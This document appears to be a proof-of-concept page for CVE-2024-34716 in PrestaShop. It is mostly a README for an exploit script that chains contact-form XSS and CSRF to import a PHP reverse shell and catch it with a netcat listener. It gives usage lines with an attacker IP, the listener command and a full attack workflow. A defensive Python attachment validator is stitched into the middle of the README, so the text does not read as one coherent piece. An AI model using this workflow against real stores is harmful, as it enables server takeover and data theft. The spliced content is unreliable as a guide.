
CVE-2024-34716 PoC — PrestaShop vulnerable to XSS via customer contact form in FO, through file upload

Associated Vulnerability
Title: PrestaShop vulnerable to XSS via customer contact form in FO, through file upload (CVE-2024-34716)
Description: PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShop installations with the customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled, a hacker can upload, through the front-office contact form, a malicious file containing an XSS that will be executed when an admin opens the attached file in the back office. The injected script can access the session and the security token, which allows it to perform any authenticated action within the scope of the administrator's rights. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature flag.
Readme
> Seems broken for now; will update later.

# Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

## Requirements

- **Netcat**: Ensure Netcat is installed and can listen on a specified port (default: 9001).
- **Python 3**: Used to serve files over HTTP.
- **Curl & JQ**: Used to fetch and handle HTTP requests and JSON parsing.

## Usage

```bash
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
```

### Arguments

- `target_url`: Base URL of the target (e.g., `https://example.com`).
- `admin_endpoint`: Path to the admin theme import endpoint.
- `admin_email`: Email address of an administrator (to spoof for the payload).
- `attacker_ip`: IP address where the reverse shell listener will receive the connection.

### Example

```bash
./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
```

### Exploit Workflow

1. **Reverse Shell Creation**: Generates a PHP reverse shell using [revshells.com](https://www.revshells.com) with the provided `attacker_ip` and port `9001`.
2. **ZIP Packaging**: The reverse shell script (`love.php`) is compressed into `Love-exploit.zip`.
3. **CSRF Token Fetch**: Retrieves the CSRF token from the target to authorize the theme import request.
4. **HTML Payload Construction**: Builds an HTML payload (`csrf_payload.html`) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.
5. **HTTP Server Setup**: A temporary HTTP server on port `8000` serves `Love-exploit.zip` for the target to import.
6. **XSS Upload and CSRF Trigger**: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. **Reverse Shell Listener**: The attacker monitors incoming connections from the victim using Netcat.
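The root cause the workflow above relies on (step 6, and the "Converting HTML to PNG" line in the example output) is that an attachment submitted through the contact form is stored and later opened by an administrator without its bytes being checked against the type it claims to be. The following validator is an added example written for this page, not PrestaShop code and not part of the PoC: it rejects attachments whose magic bytes do not match the declared image or PDF type, scans the body for browser-executable markup, and builds the response headers that make the back office serve attachments as downloads rather than rendering them. The allowed-type table, the marker list and all sample inputs are constructed assumptions.

```python
"""Defensive attachment check for customer-thread uploads (added example, not PrestaShop code)."""
import re

# Magic-byte signatures for the attachment types this example chooses to allow (assumption).
MAGIC = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "application/pdf": (b"%PDF-",),
}

# Extension -> MIME type the upload form is expected to declare (assumption).
ALLOWED_EXT = {
    "png": "image/png",
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "gif": "image/gif",
    "pdf": "application/pdf",
}

# Markers that indicate markup a browser could execute if the file were rendered inline.
ACTIVE_MARKERS = re.compile(
    rb"<\s*(script|svg|iframe|object|embed|html|body)\b|javascript:|\bon[a-z]+\s*=|<\?php",
    re.IGNORECASE,
)


def declared_type_matches(declared_mime: str, data: bytes) -> bool:
    """True when the file starts with a signature valid for the declared MIME type."""
    return any(data.startswith(sig) for sig in MAGIC.get(declared_mime, ()))


def contains_active_content(data: bytes) -> bool:
    """Coarse scan for HTML/SVG/PHP markers anywhere in the body (catches polyglots)."""
    return ACTIVE_MARKERS.search(data) is not None


def validate_attachment(filename: str, declared_mime: str, data: bytes):
    """Return (accepted, reason) for an uploaded attachment."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ALLOWED_EXT.get(ext) != declared_mime:
        return False, "extension does not match declared type"
    if not declared_type_matches(declared_mime, data):
        return False, "content does not match declared type"
    if contains_active_content(data):
        return False, "active content found in attachment"
    return True, "ok"


def download_headers(filename: str, declared_mime: str) -> dict:
    """Headers that make the back office hand the file to the browser as a download.

    Content-Disposition: attachment stops inline rendering, nosniff stops the
    browser from second-guessing the Content-Type, and the CSP blocks scripts
    even if a file were rendered anyway.
    """
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": declared_mime,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs (not real uploads).
SAMPLE_PNG = MAGIC["image/png"][0] + b"\x00" * 16 + b"IEND"
SAMPLE_HTML_AS_PNG = b"<html><body><script>console.log('constructed sample')</script></body></html>"
SAMPLE_POLYGLOT = MAGIC["image/png"][0] + b"\x00" * 8 + b"<svg onload=x></svg>"

if __name__ == "__main__":
    for name, mime, blob in [
        ("photo.png", "image/png", SAMPLE_PNG),
        ("photo.png", "image/png", SAMPLE_HTML_AS_PNG),
        ("photo.png", "image/png", SAMPLE_POLYGLOT),
        ("photo.html", "image/png", SAMPLE_PNG),
    ]:
        print(name, mime, validate_attachment(name, mime, blob))
```

The marker scan is deliberately coarse and can misfire on binary data, so in practice it is one layer on top of the magic-byte check and the download headers, not a replacement for them; the headers are the part that would have stopped an admin's browser from executing the attachment in the back office even when a disguised file slipped through.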

## Execution Steps

1. Start a Netcat listener on your machine:
   ```bash
   nc -nvlp 9001
   ```

2. Run the script:
   ```bash
   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
   ```

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

## Output

The script outputs the following information during execution:

- CSRF token retrieval status.
- Status of reverse shell creation and packaging.
- Status of payload delivery and HTTP server status.

## Important Notes

- **Permissions**: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
- **Testing Environment**: Use in a controlled, authorized environment only, such as a cybersecurity lab.
- **Port Conflicts**: Ensure ports `8000` (HTTP server) and `9001` (Netcat listener) are free before running the script.

---

### Example Output

```plaintext
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
```

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

---

### Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.
File Snapshot

```plaintext
[4.0K] /data/pocs/a8b176686e4c62482da3bf0314e9e99134f1b60d
├── [5.3K] CVE-2024-34716
└── [3.9K] README.md

0 directories, 2 files
```